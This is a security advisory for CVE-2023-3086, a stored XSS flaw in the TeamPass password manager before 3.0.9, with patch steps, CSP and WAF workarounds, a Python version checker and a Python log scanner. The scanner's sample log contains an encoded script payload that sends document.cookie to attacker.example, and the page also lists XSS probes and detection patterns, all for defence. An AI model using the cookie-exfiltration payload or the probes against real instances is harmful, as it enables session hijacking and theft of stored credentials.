CVE-2023-3086

9.0 CRITICAL

📋 TL;DR

TeamPass versions prior to 3.0.9 contain a stored cross-site scripting (XSS) flaw: an authenticated user can save content containing script that the application later renders unescaped, so it executes in the browser of every other user who views that content. Because TeamPass is a shared password vault, script running in another user's session can act with that user's privileges, hijack the session, or retrieve credentials the victim is allowed to see.

💻 Affected Systems

Products:
  • TeamPass
Versions: All versions prior to 3.0.9
Operating Systems: All
Default Config Vulnerable: ⚠️ Yes
Notes: All TeamPass deployments using vulnerable versions are affected regardless of configuration.

📦 What is this software?

TeamPass is an open-source, self-hosted collaborative password manager written in PHP with a MySQL/MariaDB backend. Teams store credentials in a folder tree and share them according to per-user and per-role access rights, so a single instance typically holds the most sensitive secrets an organisation has.

⚠️ Risk & Real-World Impact

🔴

Worst Case

An attacker plants the payload in content an administrator is known to open. The script then runs in the administrator's browser: it can change settings, grant the attacker rights, and read every item the administrator can decrypt, which in a password manager means the whole vault.

🟠

Likely Case

A low-privileged insider or a compromised account injects script that exfiltrates session cookies or item contents of whoever views the content, leading to account takeover of those users and access to the credentials they can see.

🟢

If Mitigated

With the 3.0.9 fix applied, or with a Content Security Policy that forbids inline script, injected markup is rendered inert: the attacker's text is stored but never executes, and the impact is limited to failed injection attempts.

🌐 Internet-Facing: HIGH
🏢 Internal Only: HIGH

🎯 Exploit Status

Public PoC: ⚠️ Yes
Weaponized: LIKELY
Unauthenticated Exploit: ✅ No
Complexity: LOW

Exploitation requires a TeamPass account that can write content other users will view, which in practice is most ordinary users. Once authenticated the attack is a single form submission, and the victim only has to open the affected item; no further interaction is needed.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: 3.0.9

Fix Commit (vendor repository): https://github.com/nilsteampassnet/teampass/commit/1c0825b67eb8f8b5ecc418ff7614423a275e6a79

Restart Required: No

Instructions:

1. Back up the TeamPass database and configuration.
2. Download TeamPass 3.0.9 or later from the official repository (the fix commit linked above is included from 3.0.9 on).
3. Replace the existing installation files with the patched release, keeping your configuration and any local customisations, and run the upgrade routine if the release notes call for one.
4. Confirm the admin interface reports 3.0.9 or later and that users can log in and open items.

🔧 Temporary Workarounds

Input Validation Filter

Applies to: all

Until the patch is applied the application's own input handling cannot be changed without forking it, so the practical form of this workaround is a filter in front of TeamPass (reverse proxy or WAF) that rejects form submissions containing script tags, javascript: URLs or on*= event handlers, in both raw and percent-encoded form. Treat it as a speed bump only: input filters are bypassable and do not replace the fix in 3.0.9.

Content Security Policy

Applies to: all

A CSP that forbids inline script stops an injected <script> block or inline event handler from executing even when the markup is rendered, which removes most of the impact of this bug.

Add to web server configuration: Content-Security-Policy: default-src 'self'; script-src 'self'

Caveat: this policy also blocks the application's own inline scripts and event handlers, and a PHP application of TeamPass's generation is likely to depend on them. Deploy it first as Content-Security-Policy-Report-Only with a report-uri or report-to endpoint, fix or accept what it reports, then switch to enforcing. Do not add 'unsafe-inline' to make the UI work: that re-enables exactly the injected script you are trying to block.

🧯 If You Can't Patch

  • Put a web application firewall (WAF) with XSS rules in front of the instance, and log what it blocks so injection attempts surface in monitoring
  • Restrict who can create or edit content that other users view, and keep administrator accounts from browsing items written by lower-privileged users until the instance is patched

🔍 How to Verify

Check if Vulnerable:

Any TeamPass deployment reporting a version below 3.0.9 is affected; no configuration setting avoids it.

Check Version:

Read the version from the TeamPass admin interface, or look for the version marker in the installation's configuration files (this page points at includes/config.php). Compare numerically, not as a string: 3.0.10 is newer than 3.0.9, but a plain string comparison sorts it before.

Verify Fix Applied:

Confirm the running instance reports 3.0.9 or later and that the installed files are actually from that release, not an older tree with only the version string changed. If you want a functional check, do it on a test instance or with written authorisation: save an item whose text contains a harmless probe such as <img src=x onerror=alert(1)> and confirm nothing executes when a second account views it. Do not run cookie-stealing payloads against a production vault.
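The version comparison above is where scripted checks usually go wrong, so here is an added example (not TeamPass code, nor tooling from the advisory) that reads a version marker out of a config file and compares it numerically against 3.0.9. The define('TP_VERSION', ...) / $version = "..." formats, the candidate file paths, and the sample config are all assumptions or constructed input; adjust them to the real installation.

```python
"""Version check for CVE-2023-3086 (stored XSS, fixed in TeamPass 3.0.9).

Added example, not TeamPass code. Assumptions: the deployment records its
version in a PHP file as a define() or assignment such as
define('TP_VERSION', '3.0.8'); the candidate file paths below are guesses.
"""
import re
from pathlib import Path

FIXED_VERSION = (3, 0, 9)  # first release containing the fix

# Matches define('TP_VERSION', '3.0.8') or $version = "3.0.8" (assumed formats).
VERSION_RE = re.compile(
    r"""['"]?(?:TP_VERSION|version)['"]?\s*[,=]\s*['"](\d+(?:\.\d+)+)['"]""",
    re.IGNORECASE,
)

# Constructed sample standing in for a real config file.
SAMPLE_CONFIG = (
    "<?php\n"
    "// constructed sample, not a real TeamPass file\n"
    "define('TP_VERSION', '3.0.8');\n"
)


def parse_version(version: str) -> tuple:
    """'3.0.10' -> (3, 0, 10). Integer tuples compare correctly; strings do not."""
    return tuple(int(part) for part in version.split("."))


def extract_version(text: str):
    """Return the first version string found in a config file body, or None."""
    match = VERSION_RE.search(text)
    return match.group(1) if match else None


def is_vulnerable(version: str) -> bool:
    """True when the installed version is older than 3.0.9."""
    installed = parse_version(version)
    width = max(len(installed), len(FIXED_VERSION))
    installed += (0,) * (width - len(installed))   # pad '3.1' to (3, 1, 0)
    fixed = FIXED_VERSION + (0,) * (width - len(FIXED_VERSION))
    return installed < fixed


def check_install(root: str = "/var/www/teampass"):
    """Look for the version marker in the assumed config files under root.

    Returns (version, vulnerable); (None, None) if no marker was found.
    """
    for rel in ("includes/config.php", "includes/config/include.php"):
        path = Path(root) / rel
        if path.is_file():
            version = extract_version(path.read_text(errors="replace"))
            if version:
                return version, is_vulnerable(version)
    return None, None


if __name__ == "__main__":
    import sys

    root = sys.argv[1] if len(sys.argv) > 1 else "/var/www/teampass"
    version, vulnerable = check_install(root)
    if version is None:
        print(f"no version marker found under {root}; check the admin UI instead")
    else:
        state = "VULNERABLE (< 3.0.9)" if vulnerable else "patched (>= 3.0.9)"
        print(f"TeamPass {version}: {state}")
```

Run it as python check_teampass.py /path/to/teampass. A version string alone only proves what the file claims; pair it with the functional check above if the tree may have been hand-edited.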

📡 Detection & Monitoring

Log Indicators:

  • POST requests to item or folder editing endpoints whose bodies contain script tags, javascript: URLs or on*= event handlers, raw or percent-encoded
  • Item descriptions or labels in the database containing <script, <img, <svg or event-handler attributes
  • A session identifier reused from a new source IP or User-Agent shortly after a user viewed an item (a stolen cookie being replayed)

Network Indicators:

  • HTTP requests containing suspicious script tags or encoded JavaScript
  • Outbound connections from users' browsers to unfamiliar domains immediately after they open TeamPass pages, especially with cookie or item data in the query string

SIEM Query:

source="teampass_logs" AND (http_method="POST" AND (uri="*<script*" OR uri="*javascript:*" OR uri="*onerror=*"))

Caveat: this query only inspects the request path. A stored XSS payload is submitted in the POST body, which standard access logs do not record, so extend the match to whatever field your reverse proxy or WAF writes the body into, and match the percent-encoded forms (%3Cscript, javascript%3A, onerror%3D) as well, since browsers URL-encode form data.
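The query above only sees the request path. This added example (not TeamPass code or tooling from the advisory) does the equivalent over access log lines that also carry the POST body, percent-decoding repeatedly so double-encoded payloads surface, and matching case-insensitively. The log layout with a trailing quoted body, the endpoint paths, the usernames and the attacker domain are all constructed.

```python
"""Scan proxy/WAF access logs in front of TeamPass for stored-XSS injection
attempts.  Added example, not TeamPass code.

Assumption: the log is combined-log style with the request body appended as
a final quoted field.  Stock Apache/nginx logs do not record bodies; point
this at a proxy or WAF log that does.  Paths and hosts are placeholders.
"""
import re
from urllib.parse import unquote_plus

# Constructed sample lines.
SAMPLE_LOG = [
    '10.0.0.5 - alice [12/Jun/2023:10:01:02 +0000] "POST /api/items/save HTTP/1.1" 200 512 '
    '"label=Mail+server&description=SMTP+creds"',
    '10.0.0.7 - bob [12/Jun/2023:10:02:10 +0000] "POST /api/items/save HTTP/1.1" 200 512 '
    '"label=%3Cscript%3Efetch(%27https%3A%2F%2Fattacker.example%2F%3F%27%2Bdocument.cookie)%3C%2Fscript%3E"',
    '10.0.0.9 - carol [12/Jun/2023:10:03:44 +0000] '
    '"GET /index.php?page=items&q=%253Cimg%2520src%3Dx%2520onerror%3Dalert(1)%253E HTTP/1.1" 200 2048 ""',
    '10.0.0.11 - dave [12/Jun/2023:10:04:01 +0000] "POST /api/items/save HTTP/1.1" 200 512 '
    '"label=JAVASCRIPT%3Aalert(document.domain)"',
]

# The page's three indicators plus a few common variants, all case-insensitive.
XSS_PATTERNS = [
    re.compile(p, re.IGNORECASE)
    for p in (
        r"<\s*script",
        r"javascript\s*:",
        r"\bon(error|load|mouseover|focus)\s*=",
        r"<\s*(img|svg|iframe)\b",
    )
]

# Request line, status, size, then the appended body field.
LOG_RE = re.compile(
    r'"(?P<method>[A-Z]+) (?P<uri>\S+) [^"]*" \d+ \d+ "(?P<body>[^"]*)"$'
)


def decode_layers(value: str, max_rounds: int = 3) -> str:
    """Percent-decode until stable (bounded) so %253C -> %3C -> < is caught."""
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value


def find_xss_indicators(lines):
    """Return (line_index, field, pattern) for each field that matches.

    One report per field per line: the first matching pattern wins.
    """
    hits = []
    for idx, line in enumerate(lines):
        match = LOG_RE.search(line)
        if not match:
            continue  # not in the expected layout; skip rather than guess
        for field in ("uri", "body"):
            text = decode_layers(match.group(field))
            for pattern in XSS_PATTERNS:
                if pattern.search(text):
                    hits.append((idx, field, pattern.pattern))
                    break
    return hits


if __name__ == "__main__":
    for idx, field, pattern in find_xss_indicators(SAMPLE_LOG):
        print(f"line {idx}: {field} matched {pattern!r}: {SAMPLE_LOG[idx][:80]}")
```

Bounded repeated decoding is deliberate: a single unquote misses the double-encoded GET on the third line, while unbounded decoding on attacker-controlled input is an easy way to make a log scanner spin on crafted data.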

🔗 References

  • Fix commit: https://github.com/nilsteampassnet/teampass/commit/1c0825b67eb8f8b5ecc418ff7614423a275e6a79
  • NVD entry: https://nvd.nist.gov/vuln/detail/CVE-2023-3086